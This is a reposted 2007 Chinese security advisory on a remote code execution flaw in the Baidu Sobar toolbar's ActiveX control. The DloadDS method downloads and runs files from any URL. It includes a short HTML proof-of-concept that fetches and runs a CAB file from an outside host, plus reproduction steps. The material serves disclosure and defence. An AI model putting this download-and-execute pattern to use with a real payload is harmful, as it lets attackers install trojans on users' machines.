百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码

来源:http://seclists.org
百度搜霸工具条出现高危漏洞,访问恶意网页,会下载木马执行,最新版本的工具条也受漏洞影响。百度搜霸的C:/Program Files/baidubar/BaiduBar.dll 文件提供ActiveX接口供网页进行调用,但是其中的DloadDS函数,允许攻击者在受害机器上执行任意代码。

DloadDS函数提供三个参数,分别是url地址,执行文件名,和是否显示。当url以.cab结尾时,搜霸会下载此文件到临时目录,随后以exe方式执行。
测试地址为:
http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html
点击测试之后会运行calc.exe(计算器)
详细资料参见:http://seclists.org/fulldisclosure/2007/Aug/0015.html

 

//<html>
//<head>
//<script>
//function DowndloadCalcAndRun()
//{
//	com.DloadDS("http://ruder.cdut.net/attach/calc.cab","calc.exe",0);
//}
//</script>
//</head>
//<OBJECT ID="com" CLASSID="CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"></OBJECT>
//<button οnclick="javascript:DowndloadCalcAndRun();">DowndloadCalcAndRun</button>
//</html>
 
 
--------------------------------------

百度超级搜霸远程代码执行漏洞
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
    百度超级搜霸是百度公司出品的一款免费的浏览器工具栏,提供百度公司的各种服务。更多信息请参考:
http://bar.baidu.com/sobar/promotion.html
    在百度超级搜霸中的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。
Affected Software Versions:
    百度超级搜霸5.4(Version of "BaiduBar.dll" is 2.0.2.144)
Details:
    漏洞存在于由ActiveX控件"BaiduBar.dll"导出的"DloadDS()"函数中,相关信息如下:
    InprocServer32:    C:/Program Files/baidu/bar/BaiduBar.dll
    ClassID      :     A7F05EE4-0426-454F-8013-C41E3596E9E9
    [id(0x0000001d), helpstring("method DloadDS")]
    void DloadDS(
                [in] BSTR bstrUrl, 
                [in] BSTR bstrName, 
                [in] long lShow);
    如果把bstrUrl设置成某个服务器上的CAB文件,DloadDS()函数会尝试下载这个文件到TEMP目录并解压,然后执行其中的以bstrName命名的文件,执行处的关键代码如下:
    .text:1006F407                 lea     eax, [ebp-28h]
    .text:1006F40A                 lea     ecx, [ebp-10h]
    .text:1006F40D                 push    eax            ; lpProcessInformation
    .text:1006F40E                 lea     eax, [ebp-6Ch]
    .text:1006F411                 push    eax            ; lpStartupInfo
    .text:1006F412                 push    esi            ; lpCurrentDirectory
    .text:1006F413                 push    esi            ; lpEnvironment
    .text:1006F414                 push    esi            ; dwCreationFlags
    .text:1006F415                 push    esi            ; bInheritHandles
    .text:1006F416                 push    esi            ; lpThreadAttributes
    .text:1006F417                 push    esi            ; lpProcessAttributes
    .text:1006F418                 push    esi
    .text:1006F419                 call    sub_10004147        ; get the CommandLine
    .text:1006F419
    .text:1006F41E                 push    eax            ; lpCommandLine
    .text:1006F41F                 push    esi            ; lpApplicationName
    .text:1006F420                 call    ds:CreateProcessA
     此时lpCommandLine指向"C:/DOCUME~1/administrator/LOCALS~1/Temp/calc.exe",由于之前没有任何有效的检查措施,因此攻击者可构造包含木马或者间谍程序的CAB文件,然后用DloadDS()函数下载并运行它。因此,有漏洞的百度搜霸相当于一个完美的后门。
How to Reproduce:
    Exploit在如下URL地址:
http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html
    安装百度搜霸, 用IE打开它并点击"DowndloadCalcAndRun"按纽,你会发现计数器程序(在http://ruder.cdut.net/attach/calc.cab)被下载并执行。
    如果你无法找到受影响的版本,带有数字签名的百度搜霸5.4版在如下地址也可以下载到:
http://ruder.cdut.net/attach/baidu_soba/setup.exe
    此文件的MD5值:7F751A157AF42E92FDD0AF3F179FE9AB
Solution:
    Baidu通知已经修复了此漏洞,但实际上,从http://bar.baidu.com/sobar/promotion.html下载的Baidu搜霸依旧受到影响(MD5值没变,不过可能是在线更新未成功),强烈建议用户对此CLSID设置Killbit。
Disclosure Timeline:
    2007.07.19        漏洞发现并通知厂商
    2007.07.19        厂商回应
    2007.07.23        厂商通知新版本发布但不发布公告
    2007.07.24        新版本未发布成功
    2007.08.01        厂商再次通知新版本发布,但仍未完全修复
    2007.08.02        发布公告
[UPDATE]:Baidu看到此公告后修正了错误,2007.8.2中午从http://bar.baidu.com/sobar/promotion.html上下载的程序已经修复了此漏洞。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值